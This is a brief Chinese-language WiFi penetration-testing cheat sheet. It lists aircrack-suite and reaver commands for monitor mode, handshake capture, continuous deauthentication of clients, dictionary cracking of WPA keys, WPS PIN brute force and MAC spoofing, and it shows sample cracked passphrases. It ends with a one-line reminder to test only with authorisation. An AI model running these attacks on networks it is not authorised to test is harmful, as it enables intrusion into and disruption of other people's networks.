Wifi渗透测试

Wifi渗透测试

使用airmon-ngairodump-ngaireplay-ngreaver等工具来渗透 WiFi 网络。

网络监控与数据包捕获

  1. 查看网卡状态:

    ifconfig
  2. 开启网卡监听模式:网卡名替换为您的无线网卡名称。

    airmon-ng start 网卡名
  3. 扫描附近的 WiFi 网络:监听模式网卡名替换为您的无线网卡在监听模式下的名称。

    airodump-ng 监听模式网卡名
  4. 捕获指定 WiFi 网络的数据包: 替换以下命令中的参数,其中wifi的mac是目标 WiFi 的 MAC 地址,信道是目标 WiFi 所在的信道,抓包路径是保存捕获数据包的文件路径。

    airodump-ng --bssid wifi的mac -c 信道 -w 抓包路径 监听模式网卡名

网络攻击与密码破解

  1. 发起 WiFi 攻击: 替换以下参数,wifi中设备mac是连接到目标 WiFi 的设备的 MAC 地址,wifi的mac是目标 WiFi 的 MAC 地址。

    aireplay-ng -0 0 -c 设备mac -a wifi的mac 监听模式网卡名
  2. 使用字典攻击解密 WiFi 密码: 替换字典路径抓包路径为您的字典文件路径和捕获的数据包文件路径。

    aircrack-ng -w 字典路径 抓包路径
  3. 运行 PIN 攻击破解 WPS: 替换无线网卡名目标AP的MAC,并启用自动检测以优化攻击。

    reaver -i 无线网卡名 -b 目标AP的MAC -a -S

更改 MAC 地址

  1. 关闭网络接口:

    /sbin/ifconfig eth0 down
  2. 更改 MAC 地址: 替换00:0C:29:36:97:20为您希望使用的新的 MAC 地址。

    /sbin/ifconfig eth0 hw ether 新MAC地址
  3. 重新启用网络接口:

    /sbin/ifconfig eth0 up
  4. 重启网络服务:

    systemctl  restart network

成功案例

以下是成功破解的示例输出,其中包含了 WPS PIN、WPA PSK 和 AP SSID。

[+] WPS PIN: '33235202'
[+] WPA PSK: 'fuckBBC999'
[+] AP SSID: 'TP-LINK_BBC'

[+] WPS PIN: '14978531'
[+] WPA PSK: 'I'mIronMan'
[+] AP SSID: 'CMCC-IronMan'

确保遵守相关法律法规,并仅在授权的测试环境中使用